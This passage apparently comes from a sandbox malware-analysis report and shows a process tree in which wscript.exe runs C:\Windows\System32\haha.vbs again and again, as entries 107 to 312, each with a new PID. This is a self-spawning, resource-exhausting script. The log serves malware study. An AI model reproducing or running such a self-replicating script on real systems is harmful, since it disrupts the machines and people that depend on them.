        107⤵
        
        PID:9016
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        108⤵
        
        PID:9052
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        109⤵
        
        PID:9092
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        110⤵
        
        PID:9132
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        111⤵
        
        PID:9168
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        112⤵
        
        PID:9208
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        113⤵
        
        PID:8432
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        114⤵
        
        PID:8728
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        115⤵
        
        PID:9044
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        116⤵
        
        PID:9224
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        117⤵
        
        PID:9264
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        118⤵
        
        PID:9312
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        119⤵
        
        PID:9352
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        120⤵
        
        PID:9392
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        121⤵
        
        PID:9428
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        122⤵
        
        PID:9468
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        123⤵
        
        PID:9512
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        124⤵
        
        PID:9548
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        125⤵
        
        PID:9584
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        126⤵
        
        PID:9620
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        127⤵
        
        PID:9664
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        128⤵
        
        PID:9700
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        129⤵
        
        PID:9744
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        130⤵
        
        PID:9780
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        131⤵
        
        PID:9816
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        132⤵
        
        PID:9860
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        133⤵
        
        PID:9904
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        134⤵
        
        PID:9944
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        135⤵
        
        PID:9980
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        136⤵
        
        PID:10020
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        137⤵
        
        PID:10056
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        138⤵
        
        PID:10096
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        139⤵
        
        PID:10132
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        140⤵
        
        PID:10176
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        141⤵
        
        PID:10208
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        142⤵
        
        PID:9256
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        143⤵
        
        PID:9504
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        144⤵
        
        PID:9728
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        145⤵
        
        PID:9936
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        146⤵
        
        PID:4960
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        147⤵
        
        PID:9692
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        148⤵
        
        PID:10268
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        149⤵
        
        PID:10304
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        150⤵
        
        PID:10340
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        151⤵
        
        PID:10380
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        152⤵
        
        PID:10420
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        153⤵
        
        PID:10456
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        154⤵
        
        PID:10492
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        155⤵
        
        PID:10532
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        156⤵
        
        PID:10572
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        157⤵
        
        PID:10608
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        158⤵
        
        PID:10648
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        159⤵
        
        PID:10688
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        160⤵
        
        PID:10732
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        161⤵
        
        PID:10768
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        162⤵
        
        PID:10816
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        163⤵
        
        PID:10864
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        164⤵
        
        PID:10916
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        165⤵
        
        PID:10952
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        166⤵
        
        PID:10992
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        167⤵
        
        PID:11052
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        168⤵
        
        PID:11100
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        169⤵
        
        PID:11148
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        170⤵
        
        PID:11184
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        171⤵
        
        PID:11220
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        172⤵
        
        PID:4580
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        173⤵
        
        PID:4688
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        174⤵
        
        PID:10796
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        175⤵
        
        PID:10824
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        176⤵
        
        PID:11128
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        177⤵
        
        PID:10760
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        178⤵
        
        PID:10296
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        179⤵
        
        PID:11252
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        180⤵
        
        PID:11308
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        181⤵
        
        PID:11352
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        182⤵
        
        PID:11416
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        183⤵
        
        PID:11460
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        184⤵
        
        PID:11504
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        185⤵
        
        PID:11540
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        186⤵
        
        PID:11584
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        187⤵
        
        PID:11640
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        188⤵
        
        PID:11684
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        189⤵
        
        PID:11728
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        190⤵
        
        PID:11772
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        191⤵
        
        PID:11808
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        192⤵
        
        PID:11848
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        193⤵
        
        PID:11884
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        194⤵
        
        PID:11920
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        195⤵
        
        PID:11956
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        196⤵
        
        PID:12000
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        197⤵
        
        PID:12036
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        198⤵
        
        PID:12072
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        199⤵
        
        PID:12108
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        200⤵
        
        PID:12148
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        201⤵
        
        PID:12184
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        202⤵
        
        PID:12228
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        203⤵
        
        PID:12260
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        204⤵
        
        PID:11276
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        205⤵
        
        PID:11360
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        206⤵
        
        PID:11476
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        207⤵
        
        PID:11592
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        208⤵
        
        PID:11744
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        209⤵
        
        PID:11836
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        210⤵
        
        PID:11348
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        211⤵
        
        PID:12296
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        212⤵
        
        PID:12332
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        213⤵
        
        PID:12368
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        214⤵
        
        PID:12408
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        215⤵
        
        PID:12448
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        216⤵
        
        PID:12488
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        217⤵
        
        PID:12528
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        218⤵
        
        PID:12568
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        219⤵
        
        PID:12612
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        220⤵
        
        PID:12644
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        221⤵
        
        PID:12688
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        222⤵
        
        PID:12724
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        223⤵
        
        PID:12756
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        224⤵
        
        PID:12796
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        225⤵
        
        PID:12840
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        226⤵
        
        PID:12876
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        227⤵
        
        PID:12916
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        228⤵
        
        PID:12960
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        229⤵
        
        PID:13000
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        230⤵
        
        PID:13032
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        231⤵
        
        PID:13068
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        232⤵
        
        PID:13108
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        233⤵
        
        PID:13148
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        234⤵
        
        PID:13188
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        235⤵
        
        PID:13236
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        236⤵
        
        PID:13268
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        237⤵
        
        PID:12360
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        238⤵
        
        PID:12672
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        239⤵
        
        PID:12984
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        240⤵
        
        PID:12596
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        241⤵
        
        PID:13344
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        242⤵
        
        PID:13384
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        243⤵
        
        PID:13416
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        244⤵
        
        PID:13468
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        245⤵
        
        PID:13500
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        246⤵
        
        PID:13540
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        247⤵
        
        PID:13576
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        248⤵
        
        PID:13612
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        249⤵
        
        PID:13652
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        250⤵
        
        PID:13692
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        251⤵
        
        PID:13728
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        252⤵
        
        PID:13772
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        253⤵
        
        PID:13804
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        254⤵
        
        PID:13840
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        255⤵
        
        PID:13884
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        256⤵
        
        PID:13924
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        257⤵
        
        PID:13964
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        258⤵
        
        PID:14004
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        259⤵
        
        PID:14040
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        260⤵
        
        PID:14076
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        261⤵
        
        PID:14112
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        262⤵
        
        PID:14160
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        263⤵
        
        PID:14196
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        264⤵
        
        PID:14248
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        265⤵
        
        PID:14280
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        266⤵
        
        PID:14316
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        267⤵
        
        PID:13532
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        268⤵
        
        PID:13996
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        269⤵
        
        PID:13408
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        270⤵
        
        PID:14380
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        271⤵
        
        PID:14420
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        272⤵
        
        PID:14480
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        273⤵
        
        PID:14520
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        274⤵
        
        PID:14592
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        275⤵
        
        PID:14644
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        276⤵
        
        PID:14716
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        277⤵
        
        PID:14780
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        278⤵
        
        PID:14828
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        279⤵
        
        PID:14904
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        280⤵
        
        PID:14944
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        281⤵
        
        PID:14988
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        282⤵
        
        PID:15020
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        283⤵
        
        PID:15072
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        284⤵
        
        PID:15132
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        285⤵
        
        PID:15180
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        286⤵
        
        PID:15236
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        287⤵
        
        PID:15300
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        288⤵
        
        PID:15352
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        289⤵
        
        PID:14532
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        290⤵
        
        PID:14624
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        291⤵
        
        PID:14760
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        292⤵
        
        PID:5748
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        293⤵
        
        PID:14876
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        294⤵
        
        PID:15172
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        295⤵
        
        PID:15100
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        296⤵
        
        PID:14344
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        297⤵
        
        PID:14556
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        298⤵
        
        PID:14548
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        299⤵
        
        PID:15368
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        300⤵
        
        PID:15400
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        301⤵
        
        PID:15436
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        302⤵
        
        PID:15472
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        303⤵
        
        PID:15512
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        304⤵
        
        PID:15548
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        305⤵
        
        PID:15588
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        306⤵
        
        PID:15624
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        307⤵
        
        PID:15660
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        308⤵
        
        PID:15696
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        309⤵
        
        PID:15736
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        310⤵
        
        PID:15768
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        311⤵
        
        PID:15804
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        312⤵
        
        PID:15840
        
        C:\Windows\System32\wscript.exe
